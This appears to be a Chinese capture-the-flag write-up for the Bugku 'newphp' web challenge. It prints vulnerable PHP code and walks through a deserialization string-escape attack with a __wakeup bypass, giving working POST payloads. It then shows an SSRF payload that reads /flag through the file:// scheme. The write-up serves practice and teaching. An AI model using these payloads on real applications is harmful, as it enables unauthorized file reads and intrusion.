bugku-newphp

打开题目

是一串php代码

<?php
// php版本:5.4.44
header("Content-type: text/html; charset=utf-8");
highlight_file(__FILE__);

class evil{
    public $hint;

    public function __construct($hint){
        $this->hint = $hint;
    }

    public function __destruct(){
    if($this->hint==="hint.php")
            @$this->hint = base64_encode(file_get_contents($this->hint)); 
        var_dump($this->hint);
    }

    function __wakeup() { 
        if ($this->hint != "╭(●｀∀´●)╯") { 
            //There's a hint in ./hint.php
            $this->hint = "╰(●’◡’●)╮"; 
        } 
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    global $tmp;
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    $tmp = $data;
}

function read(){
    global $tmp;
    $data = $tmp;
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

$tmp = "test";
$username = $_POST['username'];
$password = $_POST['password'];

$a = serialize(new User($username, $password));
if(preg_match('/flag/is',$a))
    die("NoNoNo!");

unserialize(read(write($a)));

发现有一个hint.php文件，试试看能不能直接访问

 

果然，没有任何东西，

还是老老实实的审计代码把

首先在evil类里$this->hint指向文件触发file_get_contents函数读取文件内容，然后提示有个hint.php，要构造触发这个evil类

 

 

再将将evil后面的数字改的更大就行了（绕过_wakeup只需对象属性个数值改得比真实对象大）

payload：O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}

然后再user类中，有read()方法和write() 方法

这两个方法都是经过处理后才进行反序列化的

这里就有一个漏洞了，php反序列化字符串逃逸

php特性：

1.PHP 在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的
2.对类中不存在的属性也会进行反序列化

漏洞原因：序列化的字符串在经过过滤函数不正确的处理而导致对象注入

详细的可以看下这篇文章

user类触发的payload为：O:4:"User":2:{s:8:"username";s:3:"111";s:8:"password";s:41:"O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}";}

这时候我们要替换掉的就是：";s:8:"password";s:41:" 共有23位

而每次添加一组\0\0\0能多吞掉3个字符，所以肯定需要3的倍数，我们可以在password的值上再加一个任意字符，即可凑齐24个

payload： username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}

 

 

再将得出的字符串进行base64解码

 

 

 访问index.cgi

得到一串代码

{
  "args": {
    "name": "Bob"
  }, 
  "headers": {
    "Accept": "*/*", 
    "Host": "httpbin.org", 
    "User-Agent": "curl/7.64.0", 
    "X-Amzn-Trace-Id": "Root=1-60cc5790-4d6de1ed0d4813ab786ed249"
  }, 
  "origin": "114.67.246.176", 
  "url": "http://httpbin.org/get?name=Bob"
}

感觉有ssrf

随便get一下

 

 

 

 果然存在

知道ssrf存在然后就可以通过file协议来直接读取flag了

payload：?name= file:///flag